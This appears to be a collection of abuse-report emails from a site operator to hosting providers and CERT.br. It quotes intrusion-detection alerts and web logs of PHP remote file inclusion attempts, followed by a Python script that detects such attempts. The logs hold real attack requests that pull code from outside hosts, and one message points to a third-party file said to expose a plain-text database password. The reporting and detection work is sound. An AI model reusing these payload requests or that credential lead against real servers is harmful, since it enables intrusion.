---------------------------------------------------------------------------------------------------

[ThePlanetAbuse-C34160139F] SECURITY_ALERT 74.54.60.50
Saturday, February 21, 2009 11:31 AM
From: "abuse@theplanet.com"
To: rmccurdyjob@yahoo.com

Reference: [ThePlanetAbuse-C34160139F]

To Whom It May Concern,

We appreciate you bringing this matter to our attention. This issue is currently being investigated. Due to privacy policies we will most likely not be able to provide you with information regarding the outcome of our investigation.

--
Regards,
Abuse Department
The Planet
abuse@theplanet.com
http://www.theplanet.com/legal/

==== Original Message ====
MIME element (text/plain)
From: Robert McCurdy [mailto:root@rmccurdy.com]
Sent: Saturday, February 21, 2009 9:57 AM
To: The Planet NOC
Subject: SECURITY_ALERT

WARNING: This is a security alert from rmccurdy.com

74.54.60.50 on your network MAY be compromised. Any questions, please contact rmccurdyjob@yahoo.com

Here are some replies from this service: http://rmccurdy.com/scripts/replies.txt

Here are more triggers from this IP. All times are EST (UTC -5):

02/21-10:07:43.088828 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 74.54.60.50:35016 -> rmccurdy.com:80
02/21-10:07:43.088828 [**] [1:2301:5] WEB-PHP Advanced Poll booth.php access [**] [Classification: access to a potentially vulnerable web application] [Priority: 2] {TCP} 74.54.60.50:35016 -> rmccurdy.com:80

Here are web server logs from that IP, if any:

74.54.60.50 - - [21/Feb/2009:10:07:43 -0500] "GET //booth.php?include_path=http://bialasinski.com//xoops_lib/modules/protector/gif/ok.txt?? HTTP/1.1" 403 211 "-" "libwww-perl/5.812"

---------------------------------------------------------------------------------------------------

[spry.com #1005051] SECURITY_ALERT
Monday, February 9, 2009 5:29 PM
From: "Support via RT"
To: rmccurdyjob@yahoo.com

Hello,

Thank you for contacting the Spry Abuse department. We have already received similar notifications and our client has removed the offending user from their system.

--

---------------------------------------------------------------------------------------------------

[domainfactory.de #1877493] SECURITY ALERT
Tuesday, February 10, 2009 5:21 AM
From: "Tobias Theisselmann via RT"
To: rmccurdyjob@yahoo.com

Dear Sirs,

Thank you for contacting us via abuse@df.eu. We have verified your complaint and wish to inform you of the current status. Please note that only the parts marked with an X are relevant for this case.

----------------------------------------------------------------------
[x] - The offending account/script has been blocked/terminated.
[ ] - User has received a written warning concerning this issue.
[ ] - User has been asked to provide a written statement concerning this issue.
----------------------------------------------------------------------

---------------------------------------------------------------------------------------------------

http://evga.ru/config/.svn/tmp/tempfile.tmp
May want to check that site out: plain text password to SQL server ...

Also want to check out the following sites for security issues:

http://www.mtya.ru/forum/index.php?act=Print&client=wordr&f=13&t=537
http://www.ormin.ru/index.php?option=com_content&view=article&id=48&Itemid=54
http://www.sacred-baikal.ru/forum/showthread.php?p=2024
http://garant-shoes.ru/index.php?page=40
http://www.go2marka.ru/index.php?option=com_content&task=view&id=26&Itemid=
http://delfon.ru/sounds_mp3.php?action=viewsexe&id=90149

--- On Fri, 2/20/09, 1Gb.ru support, Dmitry Bernikov wrote:

From: 1Gb.ru support, Dmitry Bernikov
Subject: RE: SECURITY_ALERT
To: rmccurdyjob@yahoo.com
Date: Friday, February 20, 2009, 9:09 AM

Hello.

IP 81.176.226.186 belongs to shared hosting; it holds thousands of different sites and we have no possibility to identify the exact resource. We will try to find out, but will not guarantee we find it. You may just block this IP and you will not lose any visitors, or just try to eliminate the vulnerability of your scripts.

--
1Gb.ru, support@1gb.ru
+7 (495) 221-1152, ICQ 285-466-973

From: robert mccurdy [mailto:rmccurdyjob@yahoo.com]
Sent: Friday, February 20, 2009 4:40 PM
To: 1Gb.ru Support Team, Alexey Vlasov
Subject: Re: SECURITY_ALERT

You don't get it ... that server is trying to attack mine. You need to fix it.

81.176.226.186 - - [28/Nov/2008:01:03:26 -0500] "GET /scripts/downloaded/order.php?ln=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 403 230 "-" "libwww-perl/5.805"
81.176.226.186 - - [2

------------------------------------------------------------------------

Re: SECURITY_ALERT
Thursday, February 11, 2010 10:01 AM
From: "CERT.br"
To: "Charlie Root", sistemas@intelignet.com.br, rmccurdyjob@yahoo.com, inforwave@inforwave.com.br
Cc: cert@cert.br

Hello,

I'm forwarding your email to the proper contacts for this network so they can investigate this incident.

Thank you for reporting this incident,

--
Aritana Pinheiro Falconi
CERT.br
http://www.cert.br/

----- Original message -----
To: cert@cert.br
Subject: SECURITY_ALERT
Message-Id: <20100211020431.EBE47B828@rmccurdy.com>
Date: Wed, 10 Feb 2010 21:04:31 -0500 (EST)
From: root@charter.net (Charlie Root)

WARNING: This is a security alert from rmccurdy.com

201.36.173.93 on your network MAY be compromised. This could be a false positive; please review the message and notify me if you have any questions: rmccurdyjob@yahoo.com

Here are some replies from this service: http://rmccurdy.com/scripts/replies.txt

Here are more triggers from this IP. All times are EST (UTC -5):

02/02-01:50:48.976072 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46602 -> rmccurdy.com:80
02/02-01:50:48.990087 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46601 -> rmccurdy.com:80
02/02-01:50:52.206467 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46603 -> rmccurdy.com:80
02/02-01:50:52.231370 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46604 -> rmccurdy.com:80
02/02-02:16:19.552185 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55541 -> rmccurdy.com:80
02/02-02:16:19.558743 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55539 -> rmccurdy.com:80
02/02-02:16:19.559767 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55538 -> rmccurdy.com:80
02/02-02:16:19.565856 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55540 -> rmccurdy.com:80
02/02-06:42:00.489682 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41973 -> rmccurdy.com:80
02/02-06:42:00.499980 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41972 -> rmccurdy.com:80
02/02-06:42:00.503084 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41974 -> rmccurdy.com:80
02/02-06:42:00.505947 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41975 -> rmccurdy.com:80

Here are web server logs from that IP, if any:

201.36.173.93 - - [02/Feb/2010:06:42:00 -0500] "GET /scripts//modules/4nAlbum/public/displayCategory.php?basepath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 253 "-" "Mozilla/5.0"
201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 229 "-" "Mozilla/5.0"
201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts/downloaded/dork//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 245 "-" "Mozilla/5.0"
201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts/downloaded//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 240 "-" "Mozilla/5.0"
201.36.173.93 - - [03/Feb/2010:19:10:41 -0500] "GET //GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 220 "-" "Mozilla/5.0"
201.36.173.93 - - [04/Feb/2010:12:23:14 -0500] "GET /scripts/downloaded/dork/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 242 "-" "Mozilla/5.0"
201.36.173.93 - - [04/Feb/2010:12:23:14 -0500] "GET /scripts/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 226 "-" "Mozilla/5.0"
201.36.173.93 - - [04/Feb/2010:12:23:17 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 218 "-" "Mozilla/5.0"
201.36.173.93 - - [04/Feb/2010:12:23:19 -0500] "GET /scripts/downloaded/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 237 "-" "Mozilla/5.0"
66.249.67.7 - - [10/Feb/2010:12:53:30 -0500] "GET /snortstats/201/36/173/src201.36.173.93.html HTTP/1.1" 200 10833 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
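The alerts above all fire on the same pattern: a request whose query-string parameter (include_path, page, basepath, task, ln) carries a remote URL, which is what the "WEB-PHP remote include path" Snort signature flags. The following is an added example, not the rmccurdy.com alert script, that applies that check to Apache combined-format log lines and groups hits by source IP the way the SECURITY_ALERT messages do; the log lines and addresses in SAMPLE_LOG are constructed.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format, as quoted in the alert e-mails above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value starting with one of these is a remote file include attempt.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines (documentation addresses), modelled on the logs above:
# one RFI hit, one benign request from the same host, one percent-encoded RFI hit,
# and a crawler whose User-Agent contains a URL but whose query string does not.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2009:10:07:43 -0500] "GET //booth.php?include_path=http://198.51.100.7/ok.txt?? HTTP/1.1" 403 211 "-" "libwww-perl/5.812"
192.0.2.10 - - [21/Feb/2009:10:07:44 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "libwww-perl/5.812"
192.0.2.20 - - [04/Feb/2010:12:23:14 -0500] "GET /joomla/index.php?option=com_restaurante&task=http%3A%2F%2F198.51.100.7%2Fid1.txt%3F%3F HTTP/1.1" 403 218 "-" "Mozilla/5.0"
192.0.2.30 - - [10/Feb/2010:12:53:30 -0500] "GET /snortstats/index.html HTTP/1.1" 200 10833 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""

def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_include_params(target):
    """Return (parameter, url) pairs whose value is a remote URL.
    Only the query string is inspected (split on the first '?'), so URLs in the
    path or User-Agent are ignored; parse_qsl also decodes percent-encoded values."""
    query = target.partition("?")[2]
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_SCHEMES)]

def summarize(lines):
    """Group remote-include attempts by source IP: count, include URLs seen, user agents."""
    report = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_include_params(rec["target"])
        if not hits:
            continue
        entry = report.setdefault(rec["ip"], {"count": 0, "include_urls": set(), "agents": set()})
        entry["count"] += 1
        entry["include_urls"].update(url for _, url in hits)
        entry["agents"].add(rec["ua"])
    return report

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG.splitlines()).items():
        print(ip, entry["count"], sorted(entry["include_urls"]), sorted(entry["agents"]))
```

A 403 in the quoted logs means the request was refused, so the line is evidence of scanning from that host, not of a successful include; that is why the alerts say the source MAY be compromised rather than that the target was.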